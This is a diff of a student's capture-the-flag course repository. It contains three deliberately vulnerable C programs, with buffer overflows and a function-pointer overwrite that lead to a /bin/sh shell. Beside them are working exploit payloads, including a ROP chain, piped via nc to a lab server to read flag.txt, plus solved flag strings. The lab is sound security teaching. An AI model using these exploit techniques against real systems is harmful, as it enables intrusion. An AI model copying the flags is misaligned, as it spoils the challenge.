3

4/level1/flag.txt

@@ -0,0 +1 @@
+hacklab{thanks_mario_but_the_flag_is_on_another_server}

4/level1/level1.c

@@ -0,0 +1,58 @@
+// gcc -o level1 -no-pie -fno-stack-protector level1.c
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <time.h>
+#include <unistd.h>
+
+struct topic {
+  char question[64];
+  char answer[32];
+  int (*check_response)(struct topic *topic);
+};
+
+void win() {
+  char *argv[2];
+  argv[0] = "/bin/sh";
+  argv[1] = NULL;
+  execve(argv[0], argv, NULL);
+}
+
+int check_math_response(struct topic *topic) {
+  int answer = atoi(topic->answer);
+  if (answer == 0x7a69) {
+    puts("You got it.");
+    return 0;
+  } else {
+    puts("Try again.");
+    return 1;
+  }
+}
+
+int check_weather_response(struct topic *topic) {
+  if (!strcmp(topic->answer, "Yes\n")) {
+    puts("It's inevitable.");
+    return 0;
+  } else {
+    puts("Are you sure about that?");
+    return 1;
+  }
+}
+
+int main(int argc, char **argv) {
+  // Disable output buffering. Not part of the challenge.
+  setvbuf(stdout, NULL, _IONBF, 0);
+  setvbuf(stdin, NULL, _IONBF, 0);
+
+  struct topic topics[] = {
+      {"What is 3077 * 10 + 567?", "", check_math_response},
+      {"Will it ever rain this year?", "", check_weather_response}};
+
+  srand(time(NULL));
+  struct topic *topic = &topics[rand() % 2];
+
+  puts(topic->question);
+  fgets(topic->answer, sizeof(*topic), stdin);
+  printf("addr: %X\n", topic->check_response);
+  return topic->check_response(topic);
+}

4/level1/test

@@ -0,0 +1,5 @@
+unit activation code
+32x spacer for array
+then jump address (reverse order)
+
+printf 'p90xiy6HFLfLKSyxptNlpYr1IHGlZvMS\naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x36\x12\x40\00\00\00\00\00\ncat flag.txt\n' | nc binexp.stud12.hacklab.ias.tu-bs.de 4001

4/level2/flag.txt

@@ -0,0 +1 @@
+hacklab{thanks_mario_but_the_flag_is_on_another_server}

4/level2/level2.c

@@ -0,0 +1,22 @@
+// gcc -o level2 -no-pie -fno-stack-protector level2.c
+#include <stdio.h>
+#include <unistd.h>
+
+void win() {
+  char *argv[2];
+  argv[0] = "/bin/sh";
+  argv[1] = NULL;
+  execve(argv[0], argv, NULL);
+}
+
+int main(int argc, char **argv) {
+  // Disable output buffering. Not part of the challenge.
+  setvbuf(stdout, NULL, _IONBF, 0);
+  setvbuf(stdin, NULL, _IONBF, 0);
+
+  char buffer[32];
+  puts("What do you want to talk about?");
+  fgets(buffer, 320, stdin);
+  puts("Bye.");
+  return 0;
+}

4/level2/test

@@ -0,0 +1,7 @@
+last key
+32 byte filler
+overwrite rbp with sane address (doesnt need to be specific, just dont segfault bc of memory region)
+overwrite rip with address of win
+
+printf 'hacklab{why_c4n7_y0u_ju57_d0_th3_m4th_eBPiC6YB}\naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x90\xde\xff\xff\xff\x7f\x00\00\x96\x11\x40\00\00\00\00\00\ncat flag.txt\n' > input.txt
+cat input.txt | nc binexp.stud12.hacklab.ias.tu-bs.de 4002

4/level3/flag.txt

@@ -0,0 +1 @@
+hacklab{thanks_mario_but_the_flag_is_on_another_server}

4/level3/level3.c

@@ -0,0 +1,24 @@
+// gcc -o level3 -no-pie -fno-stack-protector level3.c
+#include <stdio.h>
+#include <unistd.h>
+
+const char command[] = "/bin/sh";
+
+void win(char *cmd) {
+  char *argv[2];
+  argv[0] = cmd;
+  argv[1] = NULL;
+  execve(cmd, argv, NULL);
+}
+
+int main(int argc, char **argv) {
+  // Disable output buffering. Not part of the challenge.
+  setvbuf(stdout, NULL, _IONBF, 0);
+  setvbuf(stdin, NULL, _IONBF, 0);
+
+  char buffer[32];
+  puts("What do you want to talk about?");
+  fgets(buffer, 320, stdin);
+  puts("Bye.");
+  return 0;
+}

4/level3/test

@@ -0,0 +1,7 @@
+padding
+saved rbp
+gadget address (pop rdi, ret)
+command address (going to rdi)
+win function address (to be called with command addr in rdi as parameter)
+
+printf 'hacklab{w3lc0m3_t0_x86_64_explo1t4t1on_I0vGIviy}\naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x90\xde\xff\xff\xff\x7f\x00\00\xc3\x12\x40\00\00\00\00\00\x08\x20\x40\00\00\00\00\00\x96\x11\x40\00\00\00\00\00\ncat flag.txt\n' > input.txt